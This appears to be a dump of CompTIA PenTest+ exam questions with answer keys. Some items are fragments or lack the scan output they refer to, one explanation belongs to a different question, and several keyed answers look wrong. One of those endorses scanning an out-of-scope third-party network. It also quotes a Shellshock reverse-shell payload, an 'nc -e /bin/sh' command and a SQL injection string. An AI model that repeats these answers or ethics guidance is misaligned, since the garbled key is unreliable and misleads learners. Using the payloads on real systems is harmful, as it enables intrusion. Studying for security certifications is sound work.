PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Full version: 253 Q&As
Full version of PT0-002 Dumps
Share some PT0-002 exam dumps below.
1. A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen
from the target machine.
Which of the following MOST likely caused the attack to fail?
A. The injection was too slow.
B. The DNS information was incorrect.
C. The DNS cache was not refreshed.
D. The client did not receive a trusted response.
Answer: C
2. 0.1: inverse host lookup failed: Unknown host (UNKNOWN) [10.0.0.1] 22 (ssh) open
(UNKNOWN) [10.0.0.1] 23 (telnet) : Connection timed out
https://unix.stackexchange.com/questions/589561/what-is-nc-z-used-for
3. Which of the following describes the reason why a penetration tester would run the command
sdelete mimikatz.* on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system
Answer: B
4. A penetration tester recently completed a review of the security of a core network device
within a corporate environment.
The key findings are as follows:
• The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final
report? (Choose two.)
A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.
Answer: C,D
5. Which of the following tools would BEST allow a penetration tester to capture wireless
handshakes to reveal a Wi-Fi password from a Windows machine?
A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng
Answer: D
Explanation:
The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows
machine is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless
networks. It starts by capturing wireless network packets [1], then attempts to crack the network
password by analyzing them [1]. Aircrack-ng supports FMS, PTW, and other attack types, and
can also be used to generate keystreams for WEP and WPA-PSK encryption. It is capable of
running on Windows, Linux, and Mac OS X.
6. Reflected XSS - Input sanitization (<> ...)
7. A penetration tester needs to access a building that is guarded by locked gates, a security
team, and cameras.
Which of the following is a technique the tester can use to gain access to the IT framework
without being detected?
A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.
Answer: C
8. A penetration tester has obtained root access to a Linux-based file server and would like to
maintain persistence after reboot.
Which of the following techniques would BEST support this objective?
A. Create a one-shot system service to establish a reverse shell.
B. Obtain /etc/shadow and brute force the root password.
C. Run the nc -e /bin/sh <...> command.
D. Move laterally to create a user account on LDAP.
Answer: A
Explanation:
https://hosakacorp.net/p/systemd-user.html
9. A penetration tester needs to perform a vulnerability scan against a web server.
Which of the following tools is the tester MOST likely to choose?
A. Nmap
B. Nikto
C. Cain and Abel
D. Ettercap
Answer: B
Explanation:
https://hackertarget.com/nikto-website-scanner/
10. A penetration tester ran an Nmap scan on an Internet-facing network device with the -F
option and found a few open ports. To further enumerate, the tester ran another scan using the
following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered.
Which of the following MOST likely occurred on the second scan?
A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.
Answer: A
Explanation:
Reference: https://phoenixnap.com/kb/nmap-scan-open-ports
11. A penetration tester is able to use a command injection vulnerability in a web application to
get a reverse shell on a system.
After running a few commands, the tester runs the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Which of the following actions is the penetration tester performing?
A. Privilege escalation
B. Upgrading the shell
C. Writing a script for persistence
D. Building a bind shell
Answer: B
12. A red team completed an engagement and provided the following example in the report to
describe how the team gained access to a web server:
x' OR role LIKE '%admin%
Which of the following should be recommended to remediate this vulnerability?
A. Multifactor authentication
B. Encrypted communications
C. Secure software development life cycle
D. Parameterized queries
Answer: D
13. Which of the following assessment methods is MOST likely to cause harm to an ICS
environment?
A. Active scanning
B. Ping sweep
C. Protocol reversing
D. Packet analysis
Answer: A
14. Which of the following provides an exploitation suite with payload modules that cover the
broadest range of target system types?
A. Nessus
B. Metasploit
C. Burp Suite
D. Ettercap
Answer: B
15. A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application.
Which of the following tools should a penetration tester use FIRST to obtain relevant information
from the application without triggering alarms?
A. SQLmap
B. DirBuster
C. w3af
D. OWASP ZAP
Answer: C
Explanation:
W3AF, the Web Application Attack and Audit Framework, is an open source web application
security scanner that includes directory and filename bruteforcing in its list of capabilities.
16. A penetration tester receives the following results from an Nmap scan:
Which of the following OSs is the target MOST likely running?
A. CentOS
B. Arch Linux
C. Windows Server
D. Ubuntu
Answer: C
17. A penetration tester discovers that a web server within the scope of the engagement has
already been compromised with a backdoor.
Which of the following should the penetration tester do NEXT?
A. Forensically acquire the backdoor Trojan and perform attribution
B. Utilize the backdoor in support of the engagement
C. Continue the engagement and include the backdoor finding in the final report
D. Inform the customer immediately about the backdoor
Answer: D
18. A security firm is discussing the results of a penetration test with the client. Based on the
findings, the client wants to focus the remaining time on a critical network segment.
Which of the following BEST describes the action taking place?
A. Maximizing the likelihood of finding vulnerabilities
B. Reprioritizing the goals/objectives
C. Eliminating the potential for false positives
D. Reducing the risk to the client environment
Answer: B
Explanation:
Goal Reprioritization: Have the goals of the assessment changed? Has any new information
been found that might affect the goal or desired end state? I would also agree with A, because
by goal reprioritization you are more likely to find vulnerabilities in this specific segment of the
critical network, but it is a side effect of goal reprioritization.
19. A penetration tester completed an assessment, removed all artifacts and accounts created
during the test, and presented the findings to the client.
Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
Answer: C
20. A penetration tester has gained access to a network device that has a previously unknown
IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
Answer: D
21. An exploit developer is coding a script that submits a very large number of small requests to
a web server until the server is compromised. The script must examine each response received
and compare the data to a large number of strings to determine which data to submit next.
Which of the following data structures should the exploit developer use to make the string
comparison and determination as efficient as possible?
A. A list
B. A tree
C. A dictionary
D. An array
Answer: C
Explanation:
Data structures are used to store data in an organized form, and some data structures are more
efficient and suitable for certain operations than others. For example, hash tables, skip lists and
jump lists are dictionary data structures that can insert and access elements efficiently.
For string comparison, there are different algorithms that can measure how similar two strings
are, such as Levenshtein distance, Hamming distance or Jaccard similarity. Some of these
algorithms can be implemented using data structures such as arrays or hash tables.
22. Running a vulnerability scanner on a hybrid network segment that includes general IT
servers and industrial control systems:
A. will reveal vulnerabilities in the Modbus protocol.
B. may cause unintended failures in control systems.
C. may reduce the true positive rate of findings.
D. will create a denial-of-service condition on the IP networks.
Answer: B
Explanation:
Reference: https://www.hsdl.org/?view&did=7262
23. A company obtained permission for a vulnerability scan from its cloud service provider and
now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Answer: A
24. A penetration tester wants to test a list of common passwords against the SSH daemon on
a network device.
Which of the following tools would be BEST to use for this purpose?
A. Hashcat
B. Mimikatz
C. Patator
D. John the Ripper
Answer: C
Explanation:
https://www.kali.org/tools/patator/
25. A penetration tester was able to compromise a web server and move laterally into a Linux
web server. The tester now wants to determine the identity of the last user who signed in to the
web server.
Which of the following log files will show this activity?
A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog
Answer: D
Explanation:
The /var/log/lastlog file is a log file that stores information about the last user to sign in to the
server. This file stores information such as the username, IP address, and timestamp of the last
user to sign in to the server. It can be used by a penetration tester to determine the identity of
the last user who signed in to the web server, which can be helpful in identifying the user who
may have set up the backdoors and other malicious activities.
26. A consultant just performed a SYN scan of all the open ports on a remote host and now
needs to remotely identify the type of services that are running on the host.
Which of the following is an active reconnaissance tool that would be BEST to use to
accomplish this task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer
Answer: C
27. Which of the following situations would require a penetration tester to notify the emergency
contact for the engagement?
A. The team exploits a critical server within the organization.
B. The team exfiltrates PII or credit card data from the organization.
C. The team loses access to the network remotely.
D. The team discovers another actor on a system on the network.
Answer: D
28. A penetration tester found the following valid URL while doing a manual assessment of a
web application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a
vulnerability in this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
Answer: B
29. Penetration tester has discovered an unknown Linux 64-bit executable binary.
Which of the following tools would be BEST to use to analyze this issue?
A. Peach
B. WinDbg
C. GDB
D. OllyDbg
Answer: C
Explanation:
OllyDbg, WinDbg, and IDA are all debugging tools that support Windows environments.
GDB is a Linux-specific debugging tool.
30. A penetration tester has extracted password hashes from the lsass.exe memory process.
Which of the following should the tester perform NEXT to pass the hash and provide
persistence with the newly acquired credentials?
A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.
Answer: D
Explanation:
Mimikatz is a credential hacking tool that can be used to extract logon passwords from the
LSASS process and pass them to other systems. Once the tester has the hashes, they can then
use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system
and authenticate with the new credentials. This provides the tester with persistence on the
system, allowing them to access it even after a reboot.
"A penetration tester who has extracted password hashes from the lsass.exe memory process
can use various tools to pass the hash and gain access to other systems using the same
credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext
passwords from memory or provide a pass-the-hash capability. After gaining access to a
system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA
PenTest+ Study Guide, p. 186)
31. Performing a penetration test against an environment with SCADA devices brings additional
safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
Answer: D
Explanation:
"A significant issue identified by Wiberg is that using active network scanners, such as Nmap,
presents a weakness when attempting port recognition or service detection on SCADA devices.
Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and
find available ports. Furthermore, they can open a massive amount of connections with a
specific SCADA device but then fail to close them gracefully." And since SCADA and ICS
devices are designed and implemented with little attention having been paid to the operational
security of these devices and their ability to handle errors or unexpected events, the presence
of idle open connections may result in errors that cannot be handled by the devices.
Reference: https://www.hindawi.com/journals/scn/2018/3794603/
32. A Chief Information Security Officer wants a penetration tester to evaluate whether a
recently installed firewall is protecting a subnetwork on which many decades-old legacy
systems are connected. The penetration tester decides to run an OS discovery and a full port
scan to identify all the systems and any potential vulnerability.
Which of the following should the penetration tester consider BEFORE running a scan?
A. The timing of the scan
B. The bandwidth limitations
C. The inventory of assets and versions
D. The type of scan
Answer: C
33. A company has hired a penetration tester to deploy and set up a rogue access point on the
network.
Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Answer: B
Explanation:
Reference:
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-attack-0183880/
https://thecybersecurityman.com/2018/08/11/creating-an-evil-twin-or-fake-access-point-using-aircrack-ng-and-dnsmasq-part-2-the-attack/
34. Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?
A. Website scraping
B. Website cloning
C. Domain enumeration
D. URL enumeration
Answer: A
35. A company has recruited a penetration tester to conduct a vulnerability scan over the
network. The test is confirmed to be on a known environment.
Which of the following would be the BEST option to identify a system properly prior to
performing the assessment?
A. Asset inventory
B. DNS records
C. Web-application scan
D. Full scan
Answer: A
36. A penetration tester discovers a vulnerable web server at 10.10.1.1.
The tester then edits a Python script that sends a web exploit and comes across the following
code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/127.0.0.1/9090 0>&1",
"Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in
which the server is being run?
A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":
"text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i >& find / -perm -4000", "Accept":
"text/html,application/xhtml+xml,application/xml"}
C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":
"text/html,application/xhtml+xml,application/xml"}
D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/10.10.1.1/80" 0>&1",
"Accept": "text/html,application/xhtml+xml,application/xml"}
Answer: A
37. A penetration tester is starting an assessment but only has publicly available information
about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?
A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing
Answer: C
38. Which of the following tools would be BEST suited to perform a manual web application
security assessment? (Choose two.)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite
Answer: A,F
39. After running the enum4linux.pl command, a penetration tester received the following
output:
Which of the following commands should the penetration tester run NEXT?
A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U ''
C. smbget //192.168.100.56/web -U ''
D. smbclient //192.168.100.56/web -U '' -N
Answer: D
Explanation:
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or
system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software.
Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities
that may be exploited to gain access to a system. In this scenario, the output from the
penetration testing tool shows that 100 hosts
contained findings due to improper patch management. This indicates that the vulnerability scan
detected vulnerabilities that could have been prevented through proper patch management.
Therefore, the most likely test performed by the penetration tester is a vulnerability scan.
40. A penetration tester needs to upload the results of a port scan to a centralized security tool.
Which of the following commands would allow the tester to save the results in an
interchangeable format?
A. nmap -iL results 192.168.0.10-100
B. nmap 192.168.0.10-100 -O > results
C. nmap -A 192.168.0.10-100 -oX results
D. nmap 192.168.0.10-100 | grep "results"
Answer: C
41. A company becomes concerned when the security alarms are triggered during a penetration
test.
Which of the following should the company do NEXT?
A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.
Answer: B
42. A security company has been contracted to perform a scoped insider-threat assessment to
try to gain access to the human resources server that houses PII and salary data. The
penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the
assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Answer: B
43. Which of the following is a rules engine for managing public cloud accounts and resources?
A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite
Answer: A
Explanation:
Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows
users to define policies to enable a well-managed cloud infrastructure that is both secure and
cost optimized. It consolidates many of the ad hoc scripts organizations have into a lightweight
and flexible tool, with unified metrics and reporting.
44. A penetration tester captured the following traffic during a web-application test:
Which of the following methods should the tester use to visualize the authorization information
being transmitted?
A. Decode the authorization header using UTF-8.
B. Decrypt the authorization header using bcrypt.
C. Decode the authorization header using Base64.
D. Decrypt the authorization header using AES.
Answer: C